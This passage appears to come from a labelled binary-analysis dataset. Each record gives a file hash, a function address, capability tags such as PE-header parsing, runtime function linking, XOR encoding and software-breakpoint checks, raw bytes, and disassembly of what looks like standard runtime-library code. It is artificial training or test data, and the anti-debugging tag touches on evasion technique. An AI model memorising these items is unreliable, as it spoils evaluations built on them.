"call dword [sym.imp.KERNEL32.dll_GetConsoleCP]",
"and dword [ebp - 0x50], 0",
"cmp dword [ebp + 0x528], 0",
"mov esi, dword [ebp - 0x64]",
"mov dword [ebp - 0x7c], eax",
"mov dword [ebp - 0x74], esi",
"jbe 0x407ed6",
"and dword [ebp - 0x5c], 0",
"jmp 0x407ae0",
"mov esi, dword [ebp - 0x74]",
"mov al, byte [ebp - 0x55]",
"test al, al",
"jne 0x407bf1",
"mov al, byte [esi]",
"sub ecx, ecx",
"cmp al, 0xa",
"sete cl",
"movsx eax, al",
"push eax",
"mov dword [ebp - 0x78], ecx",
"call fcn.00405e56",
"test eax, eax",
"pop ecx",
"jne 0x407b1f",
"push 1",
"lea eax, [ebp - 0x54]",
"push esi",
"push eax",
"call fcn.0040bc0c",
"add esp, 0xc",
"cmp eax, 0xffffffff",
"je 0x407ecc",
"jmp 0x407b4f",
"mov eax, dword [ebp - 0x64]",
"sub eax, esi",
"add eax, dword [ebp + 0x528]",
"cmp eax, 1",
"jbe 0x407ecc",
"push 2",
"lea eax, [ebp - 0x54]",
"push esi",
"push eax",
"call fcn.0040bc0c",
"add esp, 0xc",
"cmp eax, 0xffffffff",
"je 0x407ecc",
"inc esi",
"inc dword [ebp - 0x5c]",
"sub eax, eax",
"push eax",
"push eax",
"push 5",
"lea ecx, [ebp + 0x50c]",
"push ecx",
"push 1",
"lea ecx, [ebp - 0x54]",
"push ecx",
"push eax",
"push dword [ebp - 0x7c]",
"inc esi",
"inc dword [ebp - 0x5c]",
"mov dword [ebp - 0x74], esi",
"call dword [sym.imp.KERNEL32.dll_WideCharToMultiByte]",
"push eax",
"pop esi",
"or esi, esi",
"je 0x407ecc",
"push 0",
"lea eax, [ebp - 0x50]",
"push eax",
"push esi",
"lea eax, [ebp + 0x50c]",
"push eax",
"mov eax, dword [edi]",
"push dword [ebx + eax]",
"call dword [sym.imp.KERNEL32.dll_WriteFile]",
"test eax, eax",
"je 0x407ec3",
"mov eax, dword [ebp - 0x50]",
"add dword [ebp - 0x60], eax",
"cmp eax, esi",
"jl 0x407ecc",
"cmp dword [ebp - 0x78], 0",
"je 0x407c55",
"push 0",
"lea eax, [ebp - 0x50]",
"push eax",
"push 1",
"lea eax, [ebp + 0x50c]",
"push eax",
"mov eax, dword [edi]",
"mov byte [ebp + 0x50c], 0xd",
"push dword [ebx + eax]",
"call dword [sym.imp.KERNEL32.dll_WriteFile]",
"or eax, eax",
"je 0x407ec3",
"cmp dword [ebp - 0x50], 1",
"jl 0x407ecc",
"inc dword [ebp - 0x68]",
"inc dword [ebp - 0x60]",
"jmp 0x407c55",
"cmp al, 1",
"je 0x407bf9",
"cmp al, 2",
"jne 0x407c14",
"movzx ecx, word [esi]",
"xor edx, edx",
"cmp cx, 0xa",
"sete dl",
"inc esi",
"inc esi",
"add dword [ebp - 0x5c], 2",
"mov dword [ebp - 0x54], ecx",
"mov dword [ebp - 0x74], esi",
"mov dword [ebp - 0x78], edx",
"cmp al, 1",
"je 0x407c1c",
"cmp al, 2",
"jne 0x407c55",
"push dword [ebp - 0x54]",
"call fcn.0040ba37",
"cmp ax, word [ebp - 0x54]",
"pop ecx",
"jne 0x407ec3",
"inc dword [ebp - 0x60]",
"cmp dword [ebp - 0x78], 0",
"je 0x407c55",
"push 0xd",
"pop eax",
"push eax",
"mov dword [ebp - 0x54], eax",
"call fcn.0040ba37",
"cmp ax, word [ebp - 0x54]",
"pop ecx",
"jne 0x407ec3",
"inc dword [ebp - 0x60]",
"inc dword [ebp - 0x68]",
"mov eax, dword [ebp + 0x528]",
"cmp dword [ebp - 0x5c], eax",
"jb 0x407add",
"jmp 0x407ecc",
"mov eax, dword [edi]",
"add eax, ebx",
"test byte [eax + 4], 0x80",
"je 0x407e9c",
"mov eax, dword [ebp - 0x64]",
"xor esi, esi",
"cmp byte [ebp - 0x55], 0",
"mov dword [ebp - 0x54], esi",
"jne 0x407d1a",
"cmp dword [ebp + 0x528], esi",
"mov dword [ebp - 0x50], eax",
"jbe 0x407efd",
"mov ecx, dword [ebp - 0x50]",
"and dword [ebp - 0x5c], 0",
"sub ecx, dword [ebp - 0x64]",
"lea eax, [ebp - 0x4c]",
"cmp ecx, dword [ebp + 0x528]",
"jae 0x407cd4",
"mov edx, dword [ebp - 0x50]",
"inc dword [ebp - 0x50]",
"mov dl, byte [edx]",
"inc ecx",
"cmp dl, 0xa",
"jne 0x407cc5",
"inc dword [ebp - 0x68]",
"mov byte [eax], 0xd",
"inc eax",
"inc dword [ebp - 0x5c]",
"mov byte [eax], dl",
"inc eax",
"inc dword [ebp - 0x5c]",
"cmp dword [ebp - 0x5c], 0x400",
"jb 0x407ca5",
"mov esi, eax",
"lea eax, [ebp - 0x4c]",
"sub esi, eax",
"push 0",
"lea eax, [ebp - 0x6c]",
"push eax",
"push esi",
"lea eax, [ebp - 0x4c]",
"push eax",
"mov eax, dword [edi]",
"push dword [ebx + eax]",
"call dword [sym.imp.KERNEL32.dll_WriteFile]",
"test eax, eax",
"je 0x407ec3",
"mov eax, dword [ebp - 0x6c]",
"add dword [ebp - 0x60], eax",
"cmp eax, esi",
"jl 0x407ecc",
"mov eax, dword [ebp - 0x50]",
"sub eax, dword [ebp - 0x64]",
"cmp eax, dword [ebp + 0x528]",
"jb 0x407c98",
"jmp 0x407ecc",
"cmp byte [ebp - 0x55], 2",
"jne 0x407dc1",
"cmp dword [ebp + 0x528], esi",
"mov dword [ebp - 0x50], eax",
"jbe 0x407efd",
"mov ecx, dword [ebp - 0x50]",
"sub esi, esi",
"sub ecx, dword [ebp - 0x64]",
"lea eax, [ebp - 0x4c]",
"cmp ecx, dword [ebp + 0x528]",
"jae 0x407d77",
"mov edx, dword [ebp - 0x50]",
"add dword [ebp - 0x50], 2",
"movzx edx, word [edx]",
"inc ecx",
"inc ecx",
"cmp dx, 0xa",
"jne 0x407d65",
"add dword [ebp - 0x68], 2",
"mov word [eax], 0xd",
"inc eax",
"inc eax",
"inc esi",
"inc esi",
"mov edi, dword [ebp - 0x70]",
"mov word [eax], dx",
"inc eax",
"inc eax",
"inc esi",
"inc esi",
"cmp esi, 0x3ff",
"jb 0x407d3e",
"push eax",
"pop esi",
"lea eax, [ebp - 0x4c]",
"sub esi, eax",
"push 0",
"lea eax, [ebp - 0x6c]",
"push eax",
"push esi",
"lea eax, [ebp - 0x4c]",
"push eax",
"mov eax, dword [edi]",
"push dword [ebx + eax]",
"call dword [sym.imp.KERNEL32.dll_WriteFile]",
"test eax, eax",
"je 0x407ec3",
"mov eax, dword [ebp - 0x6c]",
"add dword [ebp - 0x60], eax",
"cmp eax, esi",
"jl 0x407ecc",
"mov eax, dword [ebp - 0x50]",
"sub eax, dword [ebp - 0x64]",
"cmp eax, dword [ebp + 0x528]",
"jb 0x407d33",
"jmp 0x407ecc",
"cmp dword [ebp + 0x528], esi",
"mov dword [ebp - 0x5c], eax",
"jbe 0x407efd",
"mov ecx, dword [ebp - 0x5c]",
"and dword [ebp - 0x50], 0",
"sub ecx, dword [ebp - 0x64]",
"push 2",
"lea eax, [ebp + 0x3b8]",
"pop esi",
"cmp ecx, dword [ebp + 0x528]",
"jae 0x407e17",
"mov edx, dword [ebp - 0x5c]",
"movzx edx, word [edx]",
"add dword [ebp - 0x5c], esi",
"add ecx, esi",
"cmp dx, 0xa",
"jne 0x407e06",
"mov word [eax], 0xd",
"add eax, esi",
"add dword [ebp - 0x50], esi",
"add dword [ebp - 0x50], esi",
"mov word [eax], dx",
"add eax, esi",
"cmp dword [ebp - 0x50], 0x152",
"jb 0x407de3",
"sub esi, esi",
"push esi",
"push esi",
"push 0x2ab",
"lea ecx, [ebp + 0x108]",
"push ecx",
"lea ecx, [ebp + 0x3b8]",
"sub eax, ecx",
"cdq",
"sub eax, edx",
"sar eax, 1",
"push eax",
"push ecx",
"pop eax",
"push eax",
"push esi",
"push 0xfde9",
"call dword [sym.imp.KERNEL32.dll_WideCharToMultiByte]",
"push eax",
"pop edi",
"cmp edi, esi",
"je 0x407ec3",
"push 0",
"lea eax, [ebp - 0x6c]",
"push eax",
"push edi",
"pop eax",
"sub eax, esi",
"push eax",
"lea eax, [ebp + esi + 0x108]",
"push eax",
"mov eax, dword [ebp - 0x70]",
"mov eax, dword [eax]",
"push dword [ebx + eax]",
"call dword [sym.imp.KERNEL32.dll_WriteFile]",
"or eax, eax",
"je 0x407e78",
"add esi, dword [ebp - 0x6c]",
"cmp edi, esi",
"jg 0x407e4a",
"jmp 0x407e81",
"call dword [sym.imp.KERNEL32.dll_GetLastError]",
"mov dword [ebp - 0x54], eax",
"cmp edi, esi",
"jg 0x407ecc",
"mov eax, dword [ebp - 0x5c]",
"sub eax, dword [ebp - 0x64]",
"cmp eax, dword [ebp + 0x528]",
"mov dword [ebp - 0x60], eax",
"jb 0x407dd0",
"jmp 0x407ecc",
"push 0",
"lea ecx, [ebp - 0x6c]",
"push ecx",
"push dword [ebp + 0x528]",
"push dword [ebp - 0x64]",
"push dword [eax]",
"call dword [sym.imp.KERNEL32.dll_WriteFile]",
"test eax, eax",
"je 0x407ec3",
"mov eax, dword [ebp - 0x6c]",
"and dword [ebp - 0x54], 0",
"mov dword [ebp - 0x60], eax",
"jmp 0x407ecc",
"call dword [sym.imp.KERNEL32.dll_GetLastError]",
"mov dword [ebp - 0x54], eax",
"mov eax, dword [ebp - 0x60]",
"test eax, eax",
"jne 0x407f29",
"mov edi, dword [ebp - 0x70]",
"xor esi, esi",
"cmp dword [ebp - 0x54], esi",
"je 0x407efd",
"push 5",
"pop esi",
"cmp dword [ebp - 0x54], esi",
"jne 0x407ef2",
"call fcn.00403d9a",
"mov dword [eax], 9",
"jmp 0x407f1d",
"push dword [ebp - 0x54]",
"call fcn.00403dc0",
"pop ecx",
"jmp 0x407f24",
"mov eax, dword [edi]",
"test byte [ebx + eax + 4], 0x40",
"je 0x407f12",
"mov eax, dword [ebp - 0x64]",
"cmp byte [eax], 0x1a",
"jne 0x407f12",
"xor eax, eax",
"jmp 0x407f2c",
"call fcn.00403d9a",
"mov dword [eax], 0x1c",
"call fcn.00403dad",
"mov dword [eax], esi",
"or eax, 0xffffffff",
"jmp 0x407f2c",
"sub eax, dword [ebp - 0x68]",
"pop edi",
"pop ebx",
"mov ecx, dword [ebp + 0x514]",
"xor ecx, ebp",
"pop esi",
"call fcn.00401caa",
"add ebp, 0x518",
"leave",
"ret"
] |
f4f77cc4d7dad4e87e36cdce330c7edfa584d7692b488286be563e0d9fbdebc9
|
0x40b0c0
|
[
"Parse pe header"
] |
8b4c24046681394d5a740331c0c38b413c03c181385045000075f029c9668178180b010f94c15158c3
|
[
"mov ecx, dword [esp + 4]",
"cmp word [ecx], 0x5a4d",
"je 0x40b0ce",
"xor eax, eax",
"ret",
"mov eax, dword [ecx + 0x3c]",
"add eax, ecx",
"cmp dword [eax], 0x4550",
"jne 0x40b0cb",
"sub ecx, ecx",
"cmp word [eax + 0x18], 0x10b",
"sete cl",
"push ecx",
"pop eax",
"ret"
] |
f4f77cc4d7dad4e87e36cdce330c7edfa584d7692b488286be563e0d9fbdebc9
|
0x40b0f0
|
[
"Enumerate pe sections"
] |
8b4424048b483c03c80fb7411453560fb7710629d285f6578d440818761e8b7c24148b480c3bf972098b580803d93bfb720c83c20183c0283bd672e631c05f5e5bc3
|
[
"mov eax, dword [esp + 4]",
"mov ecx, dword [eax + 0x3c]",
"add ecx, eax",
"movzx eax, word [ecx + 0x14]",
"push ebx",
"push esi",
"movzx esi, word [ecx + 6]",
"sub edx, edx",
"test esi, esi",
"push edi",
"lea eax, [eax + ecx + 0x18]",
"jbe 0x40b12c",
"mov edi, dword [esp + 0x14]",
"mov ecx, dword [eax + 0xc]",
"cmp edi, ecx",
"jb 0x40b122",
"mov ebx, dword [eax + 8]",
"add ebx, ecx",
"cmp edi, ebx",
"jb 0x40b12e",
"add edx, 1",
"add eax, 0x28",
"cmp edx, esi",
"jb 0x40b112",
"xor eax, eax",
"pop edi",
"pop esi",
"pop ebx",
"ret"
] |
f4f77cc4d7dad4e87e36cdce330c7edfa584d7692b488286be563e0d9fbdebc9
|
0x40b4e5
|
[
"Link many functions at runtime"
] |
55545d83ec20535657e8f28cffff29db391d984843008945f0895dfc895df8895df40f85ad0000006844f44000ff156ce14000505f3bfb750731c0e9590100008b35bce040006838f4400057ffd63bc374e750e8458cffffc7042428f4400057a398484300ffd650e8308cffffc7042414f4400057a39c484300ffd650e81b8cffffa3a04843008d45f850e83ab2ffff09c05959740d5353535353e8ba86ffff83c414837df802752c68f8f3400057ffd650e8e68bffff3bc359a3a8484300741468e0f3400057ffd650e8ce8bffff59a3a4484300a1a44843008b75f03bc6746d3935a8484300746550e81a8cffff59ffd03bc374258d4dec516a0c8d4de0516a0150ff35a8484300e8fb8bffff59ffd085c07406f645e80175338d45f450e8ddb1ffff85c059740d5353535353e82786ffff83c414837df4047209814d1000002000eb3a814d1000000400eb31a19c4843003bc6742850e8ac8bffff59ffd03bc38945fc7418a1a04843003bc6740fff75fc50e8908bffff59ffd08945fcff7510ff750cff7508ff75fcff3598484300e8738bffff59ffd05f5e5bc9c3
|
[
"push ebp",
"push esp",
"pop ebp",
"sub esp, 0x20",
"push ebx",
"push esi",
"push edi",
"call fcn.004041e5",
"sub ebx, ebx",
"cmp dword [0x434898], ebx",
"mov dword [ebp - 0x10], eax",
"mov dword [ebp - 4], ebx",
"mov dword [ebp - 8], ebx",
"mov dword [ebp - 0xc], ebx",
"jne 0x40b5ba",
"push str.USER32.DLL",
"call dword [sym.imp.KERNEL32.dll_LoadLibraryA]",
"push eax",
"pop edi",
"cmp edi, ebx",
"jne 0x40b525",
"xor eax, eax",
"jmp 0x40b67e",
"mov esi, dword [sym.imp.KERNEL32.dll_GetProcAddress]",
"push str.MessageBoxA",
"push edi",
"call esi",
"cmp eax, ebx",
"je 0x40b51e",
"push eax",
"call fcn.00404182",
"mov dword [esp], str.GetActiveWindow",
"push edi",
"mov dword [0x434898], eax",
"call esi",
"push eax",
"call fcn.00404182",
"mov dword [esp], str.GetLastActivePopup",
"push edi",
"mov dword [0x43489c], eax",
"call esi",
"push eax",
"call fcn.00404182",
"mov dword [0x4348a0], eax",
"lea eax, [ebp - 8]",
"push eax",
"call fcn.004067af",
"or eax, eax",
"pop ecx",
"pop ecx",
"je 0x40b588",
"push ebx",
"push ebx",
"push ebx",
"push ebx",
"push ebx",
"call fcn.00403c3f",
"add esp, 0x14",
"cmp dword [ebp - 8], 2",
"jne 0x40b5ba",
"push str.GetUserObjectInformationA",
"push edi",
"call esi",
"push eax",
"call fcn.00404182",
"cmp eax, ebx",
"pop ecx",
"mov dword [0x4348a8], eax",
"je 0x40b5ba",
"push str.GetProcessWindowStation",
"push edi",
"call esi",
"push eax",
"call fcn.00404182",
"pop ecx",
"mov dword [0x4348a4], eax",
"mov eax, dword [0x4348a4]",
"mov esi, dword [ebp - 0x10]",
"cmp eax, esi",
"je 0x40b633",
"cmp dword [0x4348a8], esi",
"je 0x40b633",
"push eax",
"call fcn.004041ee",
"pop ecx",
"call eax",
"cmp eax, ebx",
"je 0x40b600",
"lea ecx, [ebp - 0x14]",
"push ecx",
"push 0xc",
"lea ecx, [ebp - 0x20]",
"push ecx",
"push 1",
"push eax",
"push dword [0x4348a8]",
"call fcn.004041ee",
"pop ecx",
"call eax",
"test eax, eax",
"je 0x40b600",
"test byte [ebp - 0x18], 1",
"jne 0x40b633",
"lea eax, [ebp - 0xc]",
"push eax",
"call fcn.004067e6",
"test eax, eax",
"pop ecx",
"je 0x40b61b",
"push ebx",
"push ebx",
"push ebx",
"push ebx",
"push ebx",
"call fcn.00403c3f",
"add esp, 0x14",
"cmp dword [ebp - 0xc], 4",
"jb 0x40b62a",
"or dword [ebp + 0x10], 0x200000",
"jmp 0x40b664",
"or dword [ebp + 0x10], 0x40000",
"jmp 0x40b664",
"mov eax, dword [0x43489c]",
"cmp eax, esi",
"je 0x40b664",
"push eax",
"call fcn.004041ee",
"pop ecx",
"call eax",
"cmp eax, ebx",
"mov dword [ebp - 4], eax",
"je 0x40b664",
"mov eax, dword [0x4348a0]",
"cmp eax, esi",
"je 0x40b664",
"push dword [ebp - 4]",
"push eax",
"call fcn.004041ee",
"pop ecx",
"call eax",
"mov dword [ebp - 4], eax",
"push dword [ebp + 0x10]",
"push dword [ebp + 0xc]",
"push dword [ebp + 8]",
"push dword [ebp - 4]",
"push dword [0x434898]",
"call fcn.004041ee",
"pop ecx",
"call eax",
"pop edi",
"pop esi",
"pop ebx",
"leave",
"ret"
] |
f4f77cc4d7dad4e87e36cdce330c7edfa584d7692b488286be563e0d9fbdebc9
|
0x40d11c
|
[
"Set environment variable"
] |
55545d83ec148b45085329db3bc357895df0751de8656cffff5353535353c70016000000e8f66bffff83c41483c8ffeb6c568b303bf38975fc74536a3d56e89b0400003bc359598945f474423bf0743e29c9385801a1a04243000f94c13b05a4424300894df8750c505fe834ffffffa3a04243003bc37560395d0c7424391da8424300741ce8bff4ffff09c0744ae8eb6bffffc7001600000083c8ff5e5f5bc9c3395df80f85960100006a04e8707fffff3bc359a3a042430074de8918391da842430075136a04e8557fffff3bc359a3a842430074c389188b35a04243003bf38975ec74b48b7df42b7dfcff75fce863feffff505f3bfb597c52391e744e8d34beff36e8267effff395df859751b8b45fc89068b45088918e9820000008b460489068b45ec478d34b8391e75f081ffffffff3f736a6a0457ff35a0424300e8b17fffff83c40c3bc37455eb4e395df80f85dd0000003bfb7d02f7df8d47023bc70f8c33ffffff3dffffff3f0f8328ffffff506a04ff35a0424300e8757fffff83c40c3bc30f840fffffff8b55fc8d0cb889118959048b4d088919a3a0424300395d0c74788b75fc6a0156e8854affff40594050e8a97effff505f3bfb5959745c5656e86d4affff4059405057e8eb7dffff83c40c85c0740d5353535353e84169ffff83c4148b4df857582bc60345f4881840f7d91bc9f7d123c85157ff1588e1400009c0750f834df0ffe86f6affffc7002a00000057e8137dffff59395df87409ff75fce8057dffff598b45f0e96afeffffff75fce8f47cffff8b450859891833c0e955feffff
|
[
"push ebp",
"push esp",
"pop ebp",
"sub esp, 0x14",
"mov eax, dword [ebp + 8]",
"push ebx",
"sub ebx, ebx",
"cmp eax, ebx",
"push edi",
"mov dword [ebp - 0x10], ebx",
"jne 0x40d14d",
"call fcn.00403d9a",
"push ebx",
"push ebx",
"push ebx",
"push ebx",
"push ebx",
"mov dword [eax], 0x16",
"call fcn.00403d3b",
"add esp, 0x14",
"or eax, 0xffffffff",
"jmp 0x40d1b9",
"push esi",
"mov esi, dword [eax]",
"cmp esi, ebx",
"mov dword [ebp - 4], esi",
"je 0x40d1aa",
"push 0x3d",
"push esi",
"call fcn.0040d5fa",
"cmp eax, ebx",
"pop ecx",
"pop ecx",
"mov dword [ebp - 0xc], eax",
"je 0x40d1aa",
"cmp esi, eax",
"je 0x40d1aa",
"sub ecx, ecx",
"cmp byte [eax + 1], bl",
"mov eax, dword [0x4342a0]",
"sete cl",
"cmp eax, dword [0x4342a4]",
"mov dword [ebp - 8], ecx",
"jne 0x40d190",
"push eax",
"pop edi",
"call fcn.0040d0bf",
"mov dword [0x4342a0], eax",
"cmp eax, ebx",
"jne 0x40d1f4",
"cmp dword [ebp + 0xc], ebx",
"je 0x40d1bd",
"cmp dword [0x4342a8], ebx",
"je 0x40d1bd",
"call fcn.0040c665",
"or eax, eax",
"je 0x40d1f4",
"call fcn.00403d9a",
"mov dword [eax], 0x16",
"or eax, 0xffffffff",
"pop esi",
"pop edi",
"pop ebx",
"leave",
"ret",
"cmp dword [ebp - 8], ebx",
"jne 0x40d35c",
"push 4",
"call fcn.0040513d",
"cmp eax, ebx",
"pop ecx",
"mov dword [0x4342a0], eax",
"je 0x40d1b5",
"mov dword [eax], ebx",
"cmp dword [0x4342a8], ebx",
"jne 0x40d1f4",
"push 4",
"call fcn.0040513d",
"cmp eax, ebx",
"pop ecx",
"mov dword [0x4342a8], eax",
"je 0x40d1b5",
"mov dword [eax], ebx",
"mov esi, dword [0x4342a0]",
"cmp esi, ebx",
"mov dword [ebp - 0x14], esi",
"je 0x40d1b5",
"mov edi, dword [ebp - 0xc]",
"sub edi, dword [ebp - 4]",
"push dword [ebp - 4]",
"call fcn.0040d072",
"push eax",
"pop edi",
"cmp edi, ebx",
"pop ecx",
"jl 0x40d268",
"cmp dword [esi], ebx",
"je 0x40d268",
"lea esi, [esi + edi*4]",
"push dword [esi]",
"call fcn.0040504a",
"cmp dword [ebp - 8], ebx",
"pop ecx",
"jne 0x40d245",
"mov eax, dword [ebp - 4]",
"mov dword [esi], eax",
"mov eax, dword [ebp + 8]",
"mov dword [eax], ebx",
"jmp 0x40d2bb",
"mov eax, dword [esi + 4]",
"mov dword [esi], eax",
"mov eax, dword [ebp - 0x14]",
"inc edi",
"lea esi, [eax + edi*4]",
"cmp dword [esi], ebx",
"jne 0x40d239",
"cmp edi, 0x3fffffff",
"jae 0x40d2bb",
"push 4",
"push edi",
"push dword [0x4342a0]",
"call fcn.00405210",
"add esp, 0xc",
"cmp eax, ebx",
"je 0x40d2bb",
"jmp 0x40d2b6",
"cmp dword [ebp - 8], ebx",
"jne 0x40d34e",
"cmp edi, ebx",
"jge 0x40d277",
"neg edi",
"lea eax, [edi + 2]",
"cmp eax, edi",
"jl 0x40d1b5",
"cmp eax, 0x3fffffff",
"jae 0x40d1b5",
"push eax",
"push 4",
"push dword [0x4342a0]",
"call fcn.00405210",
"add esp, 0xc",
"cmp eax, ebx",
"je 0x40d1b5",
"mov edx, dword [ebp - 4]",
"lea ecx, [eax + edi*4]",
"mov dword [ecx], edx",
"mov dword [ecx + 4], ebx",
"mov ecx, dword [ebp + 8]",
"mov dword [ecx], ebx",
"mov dword [0x4342a0], eax",
"cmp dword [ebp + 0xc], ebx",
"je 0x40d338",
"mov esi, dword [ebp - 4]",
"push 1",
"push esi",
"call fcn.00401d50",
"inc eax",
"pop ecx",
"inc eax",
"push eax",
"call fcn.0040517d",
"push eax",
"pop edi",
"cmp edi, ebx",
"pop ecx",
"pop ecx",
"je 0x40d338",
"push esi",
"push esi",
"call fcn.00401d50",
"inc eax",
"pop ecx",
"inc eax",
"push eax",
"push edi",
"call fcn.004050d8",
"add esp, 0xc",
"test eax, eax",
"je 0x40d301",
"push ebx",
"push ebx",
"push ebx",
"push ebx",
"push ebx",
"call fcn.00403c3f",
"add esp, 0x14",
"mov ecx, dword [ebp - 8]",
"push edi",
"pop eax",
"sub eax, esi",
"add eax, dword [ebp - 0xc]",
"mov byte [eax], bl",
"inc eax",
"neg ecx",
"sbb ecx, ecx",
"not ecx",
"and ecx, eax",
"push ecx",
"push edi",
"call dword [sym.imp.KERNEL32.dll_SetEnvironmentVariableA]",
"or eax, eax",
"jne 0x40d331",
"or dword [ebp - 0x10], 0xffffffff",
"call fcn.00403d9a",
"mov dword [eax], 0x2a",
"push edi",
"call fcn.0040504a",
"pop ecx",
"cmp dword [ebp - 8], ebx",
"je 0x40d346",
"push dword [ebp - 4]",
"call fcn.0040504a",
"pop ecx",
"mov eax, dword [ebp - 0x10]",
"jmp 0x40d1b8",
"push dword [ebp - 4]",
"call fcn.0040504a",
"mov eax, dword [ebp + 8]",
"pop ecx",
"mov dword [eax], ebx",
"xor eax, eax",
"jmp 0x40d1b8"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x40ece0
|
[
"Encode data using xor",
"Generate random numbers using a mersenne twister"
] |
a370445d0031c09083c0018b0c856c445d0089cac1ea1e31ca69d26589076c01c289148570445d003d6f0200007cd9c705a06f560070020000c3
|
[
"mov dword [0x5d4470], eax",
"xor eax, eax",
"nop",
"add eax, 1",
"mov ecx, dword [eax*4 + 0x5d446c]",
"mov edx, ecx",
"shr edx, 0x1e",
"xor edx, ecx",
"imul edx, edx, 0x6c078965",
"add edx, eax",
"mov dword [eax*4 + 0x5d4470], edx",
"cmp eax, 0x26f",
"jl 0x40ece8",
"mov dword [0x566fa0], 0x270",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x40ed20
|
[
"Encode data using xor",
"Generate random numbers using a mersenne twister"
] |
53b8ffffffff89f683c0018b0c8574445d008b1c8570445d0089ca83e201f7da81e2dfb0089981e30000008081e1ffffff7f09cbd1eb31da331485a44a5d0089148570445d003de20000007cbbb8e20000008db60000000083c0018b0c8574445d008b1c8570445d0089ca83e201f7da81e2dfb0089981e30000008081e1ffffff7f09cbd1eb31da331485e4405d0089148570445d003d6e0200007cbb8b1570445d008b0d2c4e5d0089d083e001f7d825dfb0089981e10000008081e2ffffff7f09d1d1e931c83305a04a5d00a32c4e5d00c705a06f5600000000005bc3
|
[
"push ebx",
"mov eax, 0xffffffff",
"mov esi, esi",
"add eax, 1",
"mov ecx, dword [eax*4 + 0x5d4474]",
"mov ebx, dword [eax*4 + 0x5d4470]",
"mov edx, ecx",
"and edx, 1",
"neg edx",
"and edx, 0x9908b0df",
"and ebx, 0x80000000",
"and ecx, 0x7fffffff",
"or ebx, ecx",
"shr ebx, 1",
"xor edx, ebx",
"xor edx, dword [eax*4 + 0x5d4aa4]",
"mov dword [eax*4 + 0x5d4470], edx",
"cmp eax, 0xe2",
"jl 0x40ed28",
"mov eax, 0xe2",
"lea esi, [esi]",
"add eax, 1",
"mov ecx, dword [eax*4 + 0x5d4474]",
"mov ebx, dword [eax*4 + 0x5d4470]",
"mov edx, ecx",
"and edx, 1",
"neg edx",
"and edx, 0x9908b0df",
"and ebx, 0x80000000",
"and ecx, 0x7fffffff",
"or ebx, ecx",
"shr ebx, 1",
"xor edx, ebx",
"xor edx, dword [eax*4 + 0x5d40e4]",
"mov dword [eax*4 + 0x5d4470], edx",
"cmp eax, 0x26e",
"jl 0x40ed78",
"mov edx, dword [0x5d4470]",
"mov ecx, dword [0x5d4e2c]",
"mov eax, edx",
"and eax, 1",
"neg eax",
"and eax, 0x9908b0df",
"and ecx, 0x80000000",
"and edx, 0x7fffffff",
"or ecx, edx",
"shr ecx, 1",
"xor eax, ecx",
"xor eax, dword [0x5d4aa0]",
"mov dword [0x5d4e2c], eax",
"mov dword [0x566fa0], 0",
"pop ebx",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x40ee00
|
[
"Generate random numbers using a mersenne twister"
] |
538b1da06f56008305a06f560001a120305d003b05f0665600750881fb710200007221a120305d00e8b3fefffff71520305d00a120305d00a3f0665600bb7002000089f681fb700200007514e8cffeffff31dbc705a06f5600010000008d76008b149d70445d0089d0c1e80b31d089c2c1e20781e280562c9d31c289d1c1e10f81e10000c6ef31d189c8c1e81231c85bc3
|
[
"push ebx",
"mov ebx, dword [0x566fa0]",
"add dword [0x566fa0], 1",
"mov eax, dword [0x5d3020]",
"cmp eax, dword [0x5666f0]",
"jne 0x40ee23",
"cmp ebx, 0x271",
"jb 0x40ee44",
"mov eax, dword [0x5d3020]",
"call fcn.0040ece0",
"not dword [0x5d3020]",
"mov eax, dword [0x5d3020]",
"mov dword [0x5666f0], eax",
"mov ebx, 0x270",
"mov esi, esi",
"cmp ebx, 0x270",
"jne 0x40ee60",
"call fcn.0040ed20",
"xor ebx, ebx",
"mov dword [0x566fa0], 1",
"lea esi, [esi]",
"mov edx, dword [ebx*4 + 0x5d4470]",
"mov eax, edx",
"shr eax, 0xb",
"xor eax, edx",
"mov edx, eax",
"shl edx, 7",
"and edx, 0x9d2c5680",
"xor edx, eax",
"mov ecx, edx",
"shl ecx, 0xf",
"and ecx, 0xefc60000",
"xor ecx, edx",
"mov eax, ecx",
"shr eax, 0x12",
"xor eax, ecx",
"pop ebx",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x4109b0
|
[
"Check for software breakpoints"
] |
53565766a140645600663dcb000f84f9000000663dcc000f84ef0000008d76008b1570505d0085d2740ba1204f5d00ffd289c3eb05bb244f5d0066813d104f5d0000007e1bb8f04e5d00e82102000089d8e86afbffff89d8e8d3fbffff8d76008b3beb1e8b77048b0783e001750b89fa89d8e8b5efffffeb038327fe89f785ff75e2c70300000000c783880000000000000066813d104f5d0000000f8e67000000ba304e5d0089d8e8bff0ffff89c785ff7425a1c44e5d0089470c833dc44e5d00007408a1c44e5d008978088b8394000000a3c44e5d009066812d104f5d00010066813d104f5d0000000f94c3b8f04e5d00e89501000084db740db8f04e5d00e8570100008d76005f5e5bc3
|
[
"push ebx",
"push esi",
"push edi",
"mov ax, word [0x566440]",
"cmp ax, 0xcb",
"je 0x410abc",
"cmp ax, 0xcc",
"je 0x410abc",
"lea esi, [esi]",
"mov edx, dword [0x5d5070]",
"test edx, edx",
"je 0x4109e5",
"mov eax, dword [0x5d4f20]",
"call edx",
"mov ebx, eax",
"jmp 0x4109ea",
"mov ebx, 0x5d4f24",
"cmp word [0x5d4f10], 0",
"jle 0x410a10",
"mov eax, 0x5d4ef0",
"call fcn.00410c20",
"mov eax, ebx",
"call fcn.00410570",
"mov eax, ebx",
"call fcn.004105e0",
"lea esi, [esi]",
"mov edi, dword [ebx]",
"jmp 0x410a32",
"mov esi, dword [edi + 4]",
"mov eax, dword [edi]",
"and eax, 1",
"jne 0x410a2d",
"mov edx, edi",
"mov eax, ebx",
"call fcn.0040f9e0",
"jmp 0x410a30",
"and dword [edi], 0xfffffffe",
"mov edi, esi",
"test edi, edi",
"jne 0x410a18",
"mov dword [ebx], 0",
"mov dword [ebx + 0x88], 0",
"cmp word [0x5d4f10], 0",
"jle 0x410abc",
"mov edx, 0x5d4e30",
"mov eax, ebx",
"call fcn.0040fb20",
"mov edi, eax",
"test edi, edi",
"je 0x410a8c",
